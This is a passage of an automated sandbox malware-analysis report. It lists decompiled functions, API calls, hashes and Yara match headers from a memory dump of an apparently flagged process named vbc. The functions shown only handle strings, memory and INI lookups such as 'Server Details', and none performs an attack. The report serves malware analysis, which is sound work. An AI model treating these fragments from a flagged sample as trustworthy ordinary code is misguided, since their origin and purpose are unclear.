                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DirectoryWindowsstrcpy
                                                              • String ID: PuA
                                                              • API String ID: 531766897-3228437271
                                                              • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                              • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                              • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                              • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00408348(char* __esi) {
                                                              				char* _t2;
                                                              				char* _t6;
                                                              
                                                              				_t6 = __esi;
                                                              				E00406160(__esi);
                                                              				_t2 = strrchr(__esi, 0x2e);
                                                              				if(_t2 != 0) {
                                                              					 *_t2 = 0;
                                                              				}
                                                              				return strcat(_t6, "_lng.ini");
                                                              			}





                                                              0x00408348
                                                              0x00408349
                                                              0x00408351
                                                              0x0040835b
                                                              0x0040835d
                                                              0x0040835d
                                                              0x0040836d

                                                              APIs
                                                                • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                              • strrchr.MSVCRT ref: 00408351
                                                              • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileModuleNamestrcatstrrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 3097366151-1948609170
                                                              • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                              • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
                                                              • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                              • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {
                                                              
                                                              				_t2 =  &_a12; // 0x403428
                                                              				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
                                                              			}



                                                              0x0040339d
                                                              0x004033b5

                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID: (4@$Server Details
                                                              • API String ID: 1096422788-3984282551
                                                              • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                              • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                              • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                              • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E004084CE(intOrPtr* __esi, void* __eflags) {
                                                              				intOrPtr* _t22;
                                                              				intOrPtr* _t31;
                                                              
                                                              				_t31 = __esi;
                                                              				 *__esi = 0x413320;
                                                              				_t22 = E00406549(0x1c8, __esi);
                                                              				_push(0x14);
                                                              				L004115D0();
                                                              				if(_t22 == 0) {
                                                              					_t22 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                              					 *_t22 = 0;
                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                              				}
                                                              				_push(0x14);
                                                              				 *((intOrPtr*)(_t31 + 4)) = _t22;
                                                              				L004115D0();
                                                              				if(_t22 == 0) {
                                                              					_t22 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                              					 *_t22 = 0;
                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                              				}
                                                              				_push(0x14);
                                                              				 *((intOrPtr*)(_t31 + 8)) = _t22;
                                                              				L004115D0();
                                                              				if(_t22 == 0) {
                                                              					_t22 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                              					 *_t22 = 0;
                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                              				}
                                                              				_push(0x14);
                                                              				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
                                                              				L004115D0();
                                                              				if(_t22 == 0) {
                                                              					_t22 = 0;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t22 + 0xc)) = 0;
                                                              					 *_t22 = 0;
                                                              					 *((intOrPtr*)(_t22 + 4)) = 0;
                                                              					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
                                                              					 *((intOrPtr*)(_t22 + 8)) = 0;
                                                              				}
                                                              				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
                                                              				return _t31;
                                                              			}





                                                              0x004084ce
                                                              0x004084d6
                                                              0x004084dc
                                                              0x004084e1
                                                              0x004084e3
                                                              0x004084f3
                                                              0x00408505
                                                              0x004084f5
                                                              0x004084f5
                                                              0x004084f8
                                                              0x004084fa
                                                              0x004084fd
                                                              0x00408500
                                                              0x00408500
                                                              0x00408507
                                                              0x00408509
                                                              0x0040850c
                                                              0x00408514
                                                              0x00408526
                                                              0x00408516
                                                              0x00408516
                                                              0x00408519
                                                              0x0040851b
                                                              0x0040851e
                                                              0x00408521
                                                              0x00408521
                                                              0x00408528
                                                              0x0040852a
                                                              0x0040852d
                                                              0x00408535
                                                              0x00408547
                                                              0x00408537
                                                              0x00408537
                                                              0x0040853a
                                                              0x0040853c
                                                              0x0040853f
                                                              0x00408542
                                                              0x00408542
                                                              0x00408549
                                                              0x0040854b
                                                              0x0040854e
                                                              0x00408556
                                                              0x00408568
                                                              0x00408558
                                                              0x00408558
                                                              0x0040855b
                                                              0x0040855d
                                                              0x00408560
                                                              0x00408563
                                                              0x00408563
                                                              0x0040856b
                                                              0x00408571

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                              • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                              • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                              • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406A74(void* __eax, void* __ecx, char* _a4) {
                                                              				int _v8;
                                                              				void* __edi;
                                                              				int _t27;
                                                              				intOrPtr _t28;
                                                              				intOrPtr _t31;
                                                              				intOrPtr _t42;
                                                              				intOrPtr _t52;
                                                              				void** _t55;
                                                              				void** _t56;
                                                              				void* _t59;
                                                              
                                                              				_t59 = __eax;
                                                              				_t27 = strlen(_a4);
                                                              				_t42 =  *((intOrPtr*)(_t59 + 4));
                                                              				_t52 = _t42 + _t27 + 1;
                                                              				_v8 = _t27;
                                                              				_t28 =  *((intOrPtr*)(_t59 + 0x14));
                                                              				 *((intOrPtr*)(_t59 + 4)) = _t52;
                                                              				_t55 = _t59 + 0x10;
                                                              				if(_t52 != 0xffffffff) {
                                                              					E004060FA(_t59, _t52, _t55, 1, _t28);
                                                              				} else {
                                                              					free( *_t55);
                                                              				}
                                                              				_t53 =  *(_t59 + 0x1c);
                                                              				_t31 =  *((intOrPtr*)(_t59 + 0x18));
                                                              				_t56 = _t59 + 0xc;
                                                              				if( *(_t59 + 0x1c) != 0xffffffff) {
                                                              					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
                                                              				} else {
                                                              					free( *_t56);
                                                              				}
                                                              				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
                                                              				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
                                                              				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
                                                              				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
                                                              				_t25 =  *(_t59 + 0x1c) - 1; // -1
                                                              				return _t25;
                                                              			}













                                                              0x00406a7e
                                                              0x00406a80
                                                              0x00406a85
                                                              0x00406a88
                                                              0x00406a8f
                                                              0x00406a92
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406aac
                                                              0x00406a9e
                                                              0x00406aa0
                                                              0x00406aa0
                                                              0x00406ab2
                                                              0x00406ab8
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ad0
                                                              0x00406ac1
                                                              0x00406ac3
                                                              0x00406ac3
                                                              0x00406ae3
                                                              0x00406af0
                                                              0x00406afc
                                                              0x00406aff
                                                              0x00406b06
                                                              0x00406b0c

                                                              APIs
                                                              • strlen.MSVCRT ref: 00406A80
                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,74B04DE0,00406B49,00000001,?,00000000,74B04DE0,00406D88,00000000,?,?), ref: 00406137
                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                              • memcpy.MSVCRT ref: 00406AE3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                              • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                              • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                              • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%